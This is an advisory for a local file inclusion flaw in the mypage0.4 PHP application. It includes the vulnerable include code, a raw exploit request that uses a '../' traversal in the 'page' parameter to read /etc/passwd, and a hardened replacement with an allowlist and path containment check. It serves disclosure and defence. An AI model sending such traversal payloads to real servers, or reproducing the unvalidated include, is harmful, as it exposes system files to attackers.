Vendor: mypage0.4
By: BAYBORA
CVSS: 5.3 (MEDIUM)
Vulnerability type: LFI
CWE: 22
Product Name: mypage0.4
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

mypage0.4 LFI Vulnerability

The mypage0.4 application is vulnerable to Local File Inclusion (LFI) attacks. The vulnerability allows an attacker to include local files on the server by manipulating the 'page' parameter in the index.php file. By providing a crafted value for the 'page' parameter, an attacker can include sensitive files such as the /etc/passwd file. This can lead to unauthorized access, information disclosure, and potential system compromise.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before including files. Specifically, ensure that the 'page' parameter only allows valid file names and does not allow directory traversal characters ('../'). Additionally, consider implementing access controls to restrict the files that can be included.
Source

Exploit-DB raw data:

#############################################################
# mypage0.4 LFI Vulnerability

# Author: BAYBORA

# Site: www.1923turk.biz

##############################################################

# Exploit:


Vuln file: index.php?page=LFI


Exploit:


POST http://server/index.php?page=../../../../../../../../etc/passwd

index.php

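if (isset($_GET['page'])) {
    // ...
    // The request parameter is appended to the content directory unvalidated
    $inhalt = $inhaltsordner . "/" . $_GET['page'];
}
// ...
// Removing "///" does not remove "../" sequences
$inhalt = str_replace("///", "", $inhalt);
if (FALSE == include $inhalt) { echo $notfound; }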
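
The mitigation described above, applied to the index.php excerpt, as an added example that is not part of the original advisory or of mypage0.4. The function name `resolve_page()`, the `.php` file extension and the demo directory are assumptions; `$inhaltsordner` and `$notfound` are the variables from the excerpt.

```php
<?php
// Added example: hardened replacement for the include logic in the excerpt.
// Assumptions: resolve_page() is a hypothetical helper and content files
// are stored as "<name>.php" inside the content directory.

/** Map a user-supplied page name to a file inside $baseDir, or return null. */
function resolve_page(string $baseDir, string $page): ?string
{
    // 1. Accept simple names only: no slashes, dots, null bytes or schemes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return null;
    }

    // 2. Canonicalise both paths; realpath() returns false if a path is missing.
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $target === false) {
        return null;
    }

    // 3. Containment check: the resolved file must sit under the content
    //    directory, which also rejects symlinks that point outside it.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($target) ? $target : null;
}

// Demo with a constructed content directory so the script runs stand-alone.
$inhaltsordner = sys_get_temp_dir() . '/mypage_demo_' . getmypid();
@mkdir($inhaltsordner);
file_put_contents($inhaltsordner . '/home.php', "<?php echo 'home page';");
$notfound = 'page not found';

// Constructed inputs: one valid name, the advisory's traversal value,
// and a name containing a path separator.
$inputs = ['home', '../../../../../../../../etc/passwd', 'sub/home'];
foreach ($inputs as $page) {
    $file = resolve_page($inhaltsordner, $page);
    echo str_pad($page, 38), ' => ';
    if ($file !== null) { include $file; } else { echo $notfound; }
    echo "\n";
}

unlink($inhaltsordner . '/home.php');
rmdir($inhaltsordner);
```

The name allowlist alone already blocks the traversal value; the `realpath()` containment check is the second layer that still holds if the allowlist is later loosened.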